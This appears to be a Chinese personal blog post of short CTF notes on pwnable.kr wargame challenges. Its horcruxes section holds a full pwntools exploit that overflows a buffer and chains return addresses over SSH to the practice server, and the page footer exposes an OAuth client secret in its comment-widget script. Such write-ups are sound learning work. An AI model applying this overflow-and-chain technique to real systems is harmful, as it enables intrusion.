<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="alternate" href="/atom.xml" title="blog" type="application/atom+xml">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="闲来无事刷一下pwnable.kr的题目，总结一下所学到的知识">
<meta name="keywords" content="ctf,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;pwnable.kr&#39;">
<meta property="og:url" content="http://yoursite.com/2019/02/08/pwnable-kr/index.html">
<meta property="og:site_name" content="blog">
<meta property="og:description" content="闲来无事刷一下pwnable.kr的题目，总结一下所学到的知识">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-09-15T07:44:35.221Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="&#39;pwnable.kr&#39;">
<meta name="twitter:description" content="闲来无事刷一下pwnable.kr的题目，总结一下所学到的知识">

<link rel="canonical" href="http://yoursite.com/2019/02/08/pwnable-kr/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>'pwnable.kr' | blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-3nd???">

    <a href="/3ND/" rel="section"><i class="fa fa-fw fa-user"></i>3ND???</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/02/08/pwnable-kr/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="PwnHt">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          'pwnable.kr'
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-02-08 19:21:27" itemprop="dateCreated datePublished" datetime="2019-02-08T19:21:27+08:00">2019-02-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-09-15 15:44:35" itemprop="dateModified" datetime="2019-09-15T15:44:35+08:00">2019-09-15</time>
              </span>

          
            <div class="post-description">闲来无事刷一下pwnable.kr的题目，总结一下所学到的知识</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="0x0-fd"><a href="#0x0-fd" class="headerlink" title="0x0 fd"></a>0x0 fd</h1><p>题目很简单，不多说，主要学到了main的三个参数的意义，以及如何传参数</p>
<p><a href="https://blog.csdn.net/abc_xixi111/article/details/79993899" target="_blank" rel="noopener">参考这篇博客</a></p>
<h1 id="collision"><a href="#collision" class="headerlink" title="collision"></a>collision</h1><p>这个题目，学到了\x00截断。。。</p>
<h1 id="bof"><a href="#bof" class="headerlink" title="bof"></a>bof</h1><h1 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h1><h1 id="passcode"><a href="#passcode" class="headerlink" title="passcode"></a>passcode</h1><h1 id="random"><a href="#random" class="headerlink" title="random"></a>random</h1><h1 id="input"><a href="#input" class="headerlink" title="input"></a>input</h1><p>这道题目有5个Stage</p>
<h2 id="Stage1"><a href="#Stage1" class="headerlink" title="Stage1"></a>Stage1</h2><h2 id="Stage2"><a href="#Stage2" class="headerlink" title="Stage2"></a>Stage2</h2><p>这个Stage主要学到read函数的fd指针，默认的标准输入是 0，标准输出是1，标准出错是2</p>
<h2 id="Stage3"><a href="#Stage3" class="headerlink" title="Stage3"></a>Stage3</h2><h2 id="Stage4"><a href="#Stage4" class="headerlink" title="Stage4"></a>Stage4</h2><h2 id="Stage5"><a href="#Stage5" class="headerlink" title="Stage5"></a>Stage5</h2><h1 id="horcruxes"><a href="#horcruxes" class="headerlink" title="horcruxes"></a>horcruxes</h1><p>过了许久重拾起博客，坚持每天一道pwn题目，今天做这一道题目，主要是复习 <strong>python ssh()函数的用法</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">con=ssh(host=<span class="string">'host'</span>,user=<span class="string">'user'</span>,password=<span class="string">'password'</span>,port=<span class="number">0</span>)</span><br><span class="line">r=con.connect_remote(<span class="string">'host'</span>,<span class="number">0</span>) <span class="comment">#通过ssh连接运行在服务器本地端口的程序</span></span><br><span class="line">p=con.progress(<span class="string">'./program'</span>)   <span class="comment">#运行本地程序</span></span><br></pre></td></tr></table></figure>
<p>以及 <strong>python正则</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line">re.findall(<span class="string">r"-?[\d]+"</span>,string) <span class="comment">#完美匹配数字</span></span><br></pre></td></tr></table></figure>
<p>最后在运行的时候，发现不成功，找找网上的wp,复制exploit运行，发现也不能成功，然而多运行几次就成功了，吐血，难道这个也有概率之说。。。。</p>
<p>附上自己的exploit<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">con=ssh(host=<span class="string">'pwnable.kr'</span>,user=<span class="string">'horcruxes'</span>,password=<span class="string">'guest'</span>,port=<span class="number">2222</span>)</span><br><span class="line">r=con.connect_remote(<span class="string">'localhost'</span>,<span class="number">9032</span>)</span><br><span class="line">a_addr=<span class="number">0x809FE4B</span></span><br><span class="line">b_addr=<span class="number">0x809FE6A</span></span><br><span class="line">c_addr=<span class="number">0x809FE89</span></span><br><span class="line">d_addr=<span class="number">0x809FEA8</span></span><br><span class="line">e_addr=<span class="number">0x809FEC7</span></span><br><span class="line">f_addr=<span class="number">0x809FEE6</span></span><br><span class="line">g_addr=<span class="number">0x809FF05</span></span><br><span class="line">get_addr=<span class="number">0x809FFFC</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_sum</span><span class="params">()</span>:</span></span><br><span class="line">	sum=<span class="number">0</span></span><br><span class="line">	string=r.recv()</span><br><span class="line">	<span class="keyword">print</span> string</span><br><span class="line">	num=re.findall(<span class="string">r"-?[\d]+"</span>,string)</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> num:</span><br><span class="line">		sum+=int(i)</span><br><span class="line">		<span class="keyword">print</span> i</span><br><span class="line">	<span class="keyword">return</span> sum</span><br><span class="line">payload=<span class="string">''</span></span><br><span class="line">payload+=<span class="string">'A'</span>*<span class="number">120</span>+p32(a_addr)</span><br><span class="line">payload+=p32(b_addr)</span><br><span class="line">payload+=p32(c_addr)</span><br><span class="line">payload+=p32(d_addr)</span><br><span class="line">payload+=p32(e_addr)</span><br><span class="line">payload+=p32(f_addr)</span><br><span class="line">payload+=p32(g_addr)</span><br><span class="line">payload+=p32(get_addr)</span><br><span class="line">r.recvuntil(<span class="string">'Select Menu:'</span>)</span><br><span class="line">r.sendline(<span class="string">'1'</span>)</span><br><span class="line">r.recvuntil(<span class="string">'How many EXP did you earned? : '</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">string=get_sum()</span><br><span class="line"><span class="keyword">print</span> string</span><br><span class="line">r.sendline(<span class="string">'1'</span>)</span><br><span class="line">r.recvuntil(<span class="string">'How many EXP did you earned? : '</span>)</span><br><span class="line">r.sendline(str(string))</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure></p>
<h1 id="otp"><a href="#otp" class="headerlink" title="otp"></a>otp</h1><p>参考这篇博客：</p>
<p>(<a href="https://r00tnb.github.io/2018/02/26/pwnable.kr-otp/)[https://r00tnb.github.io/2018/02/26/pwnable.kr-otp/]" target="_blank" rel="noopener">https://r00tnb.github.io/2018/02/26/pwnable.kr-otp/)[https://r00tnb.github.io/2018/02/26/pwnable.kr-otp/]</a></p>
<p><strong>ulimit</strong> 命令学到了，详情 <strong>man</strong></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf-pwn/" rel="tag"># ctf,pwn</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/02/02/程序保护/" rel="next" title="'程序保护'">
                  <i class="fa fa-chevron-left"></i> '程序保护'
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/03/06/metasploit学习/" rel="prev" title="'metasploit学习'">
                  'metasploit学习' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0-fd"><span class="nav-number">1.</span> <span class="nav-text">0x0 fd</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#collision"><span class="nav-number">2.</span> <span class="nav-text">collision</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#bof"><span class="nav-number">3.</span> <span class="nav-text">bof</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#flag"><span class="nav-number">4.</span> <span class="nav-text">flag</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#passcode"><span class="nav-number">5.</span> <span class="nav-text">passcode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#random"><span class="nav-number">6.</span> <span class="nav-text">random</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#input"><span class="nav-number">7.</span> <span class="nav-text">input</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage1"><span class="nav-number">7.1.</span> <span class="nav-text">Stage1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage2"><span class="nav-number">7.2.</span> <span class="nav-text">Stage2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage3"><span class="nav-number">7.3.</span> <span class="nav-text">Stage3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage4"><span class="nav-number">7.4.</span> <span class="nav-text">Stage4</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage5"><span class="nav-number">7.5.</span> <span class="nav-text">Stage5</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#horcruxes"><span class="nav-number">8.</span> <span class="nav-text">horcruxes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#otp"><span class="nav-number">9.</span> <span class="nav-text">otp</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="site-author-image" itemprop="image" alt="PwnHt"
    src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">PwnHt</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">46</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/pwnht" title="GitHub &rarr; https://github.com/pwnht" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/05171683@cumt.edu.cn" title="E-Mail &rarr; 05171683@cumt.edu.cn"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://3nd.xyz/" title="https://3nd.xyz/" rel="noopener" target="_blank">3ND</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://dayjun.top/" title="https://dayjun.top/" rel="noopener" target="_blank">哒君</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://iyzyi.com/" title="http://iyzyi.com/" rel="noopener" target="_blank">iyzyi</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">PwnHt</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.5.0
  </div>

        












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  
















  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID: '0c9c9c5050bd212943da',
      clientSecret: 'e88bf594e600fa4c1956d2ff2b5aeab8ea9ece28',
      repo: 'gitalk-commnet',
      owner: 'pwnht',
      admin: ['pwnht'],
      id: '9b5e6960d586ff6e284bdbc7c0a7acef',
        language: 'zh-CN',
      distractionFreeMode: 'false'
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
</script>

</body>
</html>
